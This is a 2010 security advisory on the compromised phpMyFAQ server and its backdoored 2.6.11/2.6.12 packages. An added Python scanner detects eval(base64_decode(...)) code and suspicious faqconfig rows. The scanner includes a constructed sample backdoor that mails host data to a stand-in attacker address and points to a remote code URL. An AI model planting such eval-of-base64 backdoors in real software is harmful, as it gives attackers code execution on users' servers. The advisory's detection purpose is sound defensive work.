Security Advisory 2010-12-15

phpmyfaq.de compromised

Issued on:
2010-12-15
Software:
phpMyFAQ 2.6.11 and 2.6.12 (all releases > 2.6.10 at the time of this advisory)
Risk:
Critical
Platforms:
all

The main server of the phpMyFAQ project was compromised in an attack that allowed a rogue version of the phpMyFAQ software to be uploaded and distributed from December 4th until December 15th, 2010. The affected versions are phpMyFAQ 2.6.11 and 2.6.12, both the zip and the tar.gz packages. The attacker also replaced the MD5 checksum files, so a package whose checksum matches the published MD5 file is not thereby shown to be clean; compare against checksums or a copy obtained from a trusted source instead.

Description

The attacker added a backdoor to the file inc/Faq.php in the method getTopTen(). The injected code was base64 encoded; when executed it first sent an e-mail to a GMail address and then added an entry to the faqconfig table. With this entry in place, a backdoor was opened that allowed arbitrary PHP code to be included. There are therefore two things to inspect on an affected installation: the file inc/Faq.php and the contents of the faqconfig table.

Solution

The phpMyFAQ Team will release a new, clean phpMyFAQ version 2.6.13. All users of affected phpMyFAQ versions are encouraged to upgrade to this latest version as soon as possible.

Workaround

If you use phpMyFAQ 2.6.11 or phpMyFAQ 2.6.12 downloaded on or after December 4th and before December 15th, you should replace the file inc/Faq.php with a clean copy as soon as possible. Replacing the file does not remove the entry the backdoor wrote into the faqconfig table; check that table for entries you did not create and remove them as well.
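The following scanner is an added example for this advisory, not code from the phpMyFAQ project, covering both the description of the backdoor and the workaround above. It flags PHP source where eval(), include() or similar is fed directly from base64_decode(), decodes long base64 string literals and reports ones that contain calls such as mail() or references to faqconfig, and flags faqconfig rows whose name a clean install does not define or whose value looks like code or a remote reference. The PHP sample, the payload, the config names and the faqconfig column names (config_name, config_value) are constructed assumptions; the advisory does not give the actual injected code or the entry it wrote.

```python
import base64
import re

# Constructs a clean inc/Faq.php should not need (assumption about the clean file;
# confirm against a copy obtained from a trusted source before relying on this list).
SUSPICIOUS_CALLS = ("eval(", "mail(", "faqconfig", "include", "require", "system(", "assert(")

# A quoted run of 40+ base64 characters: long enough to carry code, rare in ordinary PHP source.
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{40,}={0,2})['"]""")
# Execution fed straight from base64_decode(): eval(base64_decode(..)), include(base64_decode(..)), ...
EXEC_B64 = re.compile(r"\b(eval|assert|include|require|include_once|require_once)\s*\(?\s*base64_decode\s*\(")
# faqconfig values that look like code or a remote reference rather than a setting.
CODE_HINTS = re.compile(r"<\?php|\beval\s*\(|base64_decode|\$_(GET|POST|REQUEST|COOKIE)|https?://")


def decode_literals(src):
    """Return the decoded text of every long base64 string literal found in src."""
    decoded = []
    for m in B64_LITERAL.finditer(src):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:  # not valid base64 after all (binascii.Error is a ValueError)
            continue
    return decoded


def scan_php(src):
    """Return a list of findings for one PHP source text; an empty list means nothing was flagged."""
    findings = []
    for m in EXEC_B64.finditer(src):
        findings.append("%s() fed from base64_decode() at offset %d" % (m.group(1), m.start()))
    for text in decode_literals(src):
        hits = [c for c in SUSPICIOUS_CALLS if c in text]
        if hits:
            findings.append("base64 literal decodes to PHP using: " + ", ".join(hits))
    return findings


def suspicious_config_rows(rows, known_names):
    """rows: (config_name, config_value) pairs as read from faqconfig (column names assumed).
    known_names: the config names a clean install of your version defines."""
    flagged = []
    for name, value in rows:
        reasons = []
        if name not in known_names:
            reasons.append("config_name not defined by a clean install")
        if CODE_HINTS.search(value):
            reasons.append("config_value looks like code or a remote reference")
        if reasons:
            flagged.append((name, reasons))
    return flagged


# --- constructed samples: not the real phpMyFAQ file, backdoor or config ---
CLEAN_FAQ = """<?php
class PMF_Faq
{
    public function getTopTen($language = null)
    {
        $query = sprintf("SELECT id, thema FROM %sfaqdata WHERE active = 'yes'", SQLPREFIX);
        return $this->db->query($query);
    }
}
"""

# Stand-in for the injected code: mails the host name out, then writes a row into faqconfig.
PAYLOAD = ('mail("attacker@example.invalid", "new install", $_SERVER["HTTP_HOST"]); '
           '$this->db->query("INSERT INTO faqconfig VALUES (\'main.extra\', \'1\')");')
BACKDOORED_FAQ = CLEAN_FAQ.replace(
    "return $this->db->query($query);",
    "eval(base64_decode('%s'));\n        return $this->db->query($query);"
    % base64.b64encode(PAYLOAD.encode()).decode())

KNOWN_NAMES = {"main.currentVersion", "main.language", "main.titleFAQ"}  # assumed clean names
CLEAN_ROWS = [("main.currentVersion", "2.6.12"), ("main.language", "language_en.php"),
              ("main.titleFAQ", "FAQ")]
INFECTED_ROWS = CLEAN_ROWS + [("main.extra", "http://example.invalid/code.txt")]  # constructed row

if __name__ == "__main__":
    for label, src in (("clean", CLEAN_FAQ), ("backdoored", BACKDOORED_FAQ)):
        print(label, scan_php(src) or ["no findings"])
    print(suspicious_config_rows(INFECTED_ROWS, KNOWN_NAMES))
```

To use it on a real installation, read your inc/Faq.php and pass its text to scan_php(), and feed the rows of your faqconfig table to suspicious_config_rows() together with the config names taken from a clean 2.6.13 install. An empty result is not proof that the file is clean; the definitive check is a comparison against a copy obtained from a trusted source, because the MD5 files on the compromised server were replaced too.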